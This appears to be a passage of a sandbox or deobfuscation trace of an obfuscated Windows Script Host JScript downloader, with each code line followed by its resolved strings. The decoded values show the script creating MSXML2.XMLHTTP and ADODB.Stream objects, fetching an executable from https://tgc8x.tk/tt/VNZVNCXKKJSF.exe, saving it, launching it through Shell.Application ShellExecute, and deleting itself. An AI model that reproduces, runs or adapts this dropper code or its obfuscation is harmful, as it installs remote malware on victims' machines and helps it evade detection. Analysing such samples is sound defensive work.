ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW _0x3974() ➔ toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute _0x3974() ➔ toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute
143	return _0xe99d =
144	function (_0xe99d3f, _0x318392) {	_0xe99d(234,undefined) ➔ "DeleteFile" _0xe99d(260,undefined) ➔ "push" _0xe99d(234,undefined) ➔ "W4ZdJrRdRue" _0xe99d(260,undefined) ➔ "76392yWuOtG" _0xe99d(233,undefined) ➔ "DeleteFile" _0xe99d(234,undefined) ➔ "421620Dulpsf" _0xe99d(260,undefined) ➔ "W73dVr7dRxtcHSkIW4xcK27cLSoWWOa" _0xe99d(233,undefined) ➔ "W4ZdJrRdRue" _0xe99d(234,undefined) ➔ "282elZIVv" _0xe99d(260,undefined) ➔ "5991OPUtAM"
145	_0xe99d3f = _0xe99d3f - 0xc8;
146	var _0x59ecb7 = _0x3974d[_0xe99d3f];
147	return _0x59ecb7;
148	}, _0xe99d ( _0x304024, _0x5125dd );
149	}
150	function _0x4a61() {	_0x4a61() ➔ Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD
151	var _0x295f59 = _0x5099, _0x126005 = _0x56566c, _0x377202 = [ _0x126005 ( 0xef ), 'Open', _0x126005 ( 0xe7 ), 'ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW', _0x126005 ( 0xda ), _0x126005 ( 0x10c ), _0x126005 ( 0xf7 ), _0x126005 ( 0xf3 ), _0x295f59 ( 0xe6, 'J(3^' ), _0x126005 ( 0xf9 ), _0x126005 ( 0xd8 ), _0x126005 ( 0xe5 ), _0x126005 ( 0xcb ), 'vcFcV8kjWRZdHmk4WROea0xcUa', _0x126005 ( 0xf2 ), _0x126005 ( 0xec ), _0x126005 ( 0xfd ), '995898DfgeKn', _0x295f59 ( 0x109, '!Ro&' ), _0x295f59 ( 0xe0, 'e(J5' ), 'Type', _0x295f59 ( 0xfe, 'h2t$' ), _0x126005 ( 0x102 ), _0x295f59 ( 0x10b, 'pUd0' ), _0x126005 ( 0xee ), 'xSkvWPCOWOniFvTXeCkMbCkL', _0x295f59 ( 0xf0, 'Uvs9' ), _0x295f59 ( 0xca, 'cLA8' ), _0x126005 ( 0x107 ), 'W4NdNCkFW6WLcfzu', 'Shell.Application', _0x295f59 ( 0xd3, '4J2k' ), _0x295f59 ( 0xc9, 'IG#1' ), _0x126005 ( 0x103 ), _0x295f59 ( 0xde, 'Umy3' ), _0x126005 ( 0xd1 ) ];	_0x126005(239) ➔ "Send" _0x126005(231) ➔ "DeleteFile" _0x126005(218) ➔ "428748eDivLq" _0x126005(268) ➔ "uqtdR8kPceWHW5tdNW" _0x126005(247) ➔ "AJ3cTmowW6WowIz1WO5WW4O" _0x126005(243) ➔ "W4yuy1BdPSoFWOOIgCo6qge" _0x295f59(230,"J(3^") ➔ "SaveToFile" _0x126005(249) ➔ "WQ3cNSkvBW" _0x126005(216) ➔ "W4BcISoRW5qtgXxcIx3cPCog" _0x126005(229) ➔ "W5pdICkQkCk1WQ53WQZdRCo6tSoA" _0x126005(203) ➔ "279BGVghm" _0x126005(242) ➔ "WOZcHCkvkCo+WOXZnuxcKKbM" _0x126005(236) ➔ "Scripting.FileSystemObject" _0x126005(253) ➔ "https://tgc8x.tk/tt/VNZVNCXKKJSF.exe" _0x295f59(265,"!Ro&") ➔ "5QEmMYO" _0x295f59(224,"e(J5") ➔ "MSXML2.XMLHTTP" _0x295f59(254,"h2t$") ➔ "W7pdMCoine3dQ8oDW6rTaczvl1e" _0x126005(258) ➔ "76392yWuOtG" _0x295f59(267,"pUd0") ➔ "WRRcG8o6" _0x126005(238) ➔ "1268392teACcP" _0x295f59(240,"Uvs9") ➔ "\VNZVNCXKKJSF.exe" _0x295f59(202,"cLA8") ➔ "CreateObject" _0x126005(263) ➔ "Position" _0x295f59(211,"4J2k") ➔ "463900CaNtRp" _0x295f59(201,"IG#1") ➔ "W4BcLCo0oJRcS8kdW4SaWO1/WQaN" _0x126005(259) ➔ "W73dVr7dRxtcHSkIW4xcK27cLSoWWOa" _0x295f59(222,"Umy3") ➔ "W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko" _0x126005(209) ➔ "W4SFgdRcImkKWOiD"
152	return _0x4a61 =
153	function () {	_0x4a61() ➔ Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD _0x4a61() ➔ Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD _0x4a61() ➔ Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send _0x4a61() ➔ Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send _0x4a61() ➔ Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send _0x4a61() ➔ Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send _0x4a61() ➔ Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send _0x4a61() ➔ Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send _0x4a61() ➔ DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send,Open _0x4a61() ➔ DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send,Open
154	return _0x377202;
155	}, _0x4a61 ( );
156	}
157	var Stream = WScript[_0x115fc7 ( 0x8f ) ] ( _0x155c25 ( 0x7f, _0x56566c ( 0xed ) ) );	_0x115fc7(143) ➔ "CreateObject" _0x56566c(237) ➔ "BQ9o" _0x155c25(127,"BQ9o") ➔ "ADODB.Stream" Windows Script Host.CreateObject("ADODB.Stream") ➔
158	function _0x3974() {	_0x3974() ➔ dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB
159	var _0x42fe7d = [ 'dXnloCodW7pcV8k0', 'uqtdR8kPceWHW5tdNW', 'ShellExecute', 'toString', 'hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof', 'WOqoW6PSsSoAc0BdH0GfCq', '279BGVghm', 'WQLhE3xcLSkBWQ5naCorW6xdUq', 'bYVcLCkh', 'uSkzW6xdIW', 'ECoyWQGeWQzGhSkBtMlcPW', 'RzXUsr', 'W4SFgdRcImkKWOiD', 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=', 'w1vrmSoRW7VdJCkJWOVdGaldVq', 'WQtdNh4FpYK', 'AJirxSkZWOCCya9JWPhdJG', 'shift', 'WPBcTCoPW5misfRdSN7dL8oPbq', 'W4BcISoRW5qtgXxcIx3cPCog', 'EMpdGSkmdSoXsCk+W6u', '428748eDivLq', 'q2iIW7/cNf9lcq/cV8k6WOb2', 'fromCharCode', 'vUkl', 'ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO', 'length', 'WOVdSmovWONdJZGXzKNdMfxcOmo2rq', 'Bhsp', '4(*W', 'qCVKfY', 'WRNdUKyZlrG', 'W5pdICkQkCk1WQ53WQZdRCo6tSoA', 'W6LlWOT6F3X+W7JdK8od', 'DeleteFile', 'W4ZdJrRdRue', '421620Dulpsf', '282elZIVv', 'W6JcQSofWRK', 'Scripting.FileSystemObject', 'BQ9o', '1268392teACcP', 'Send', 'WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt', 'AXxcQSkOWRG', 'WOZcHCkvkCo+WOXZnuxcKKbM', 'W4yuy1BdPSoFWOOIgCo6qge', 'bs19WQHMoNZdH8oAW5eX', 'W69VWRvm', '10MQXdOq', 'AJ3cTmowW6WowIz1WO5WW4O', 'WR8BoCkPbXTiCCo9cW', 'WQ3cNSkvBW', '8ApAyti', 'WQquW65/F8ol', 'W)L8', 'https://tgc8x.tk/tt/VNZVNCXKKJSF.exe', 'A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW', 'WPRdHSkOWQrddhC', 'charCodeAt', 'push', '76392yWuOtG', 'W73dVr7dRxtcHSkIW4xcK27cLSoWWOa', '5991OPUtAM', '13285611Ofkcqp', 'ScriptFullName', 'Position', 'nmkoFSotW53cKq', 'yxSPWPPSBJW', 'AJCsxmk1WOXXxYPeWPJdSmoB' ];
160	_0x3974 =
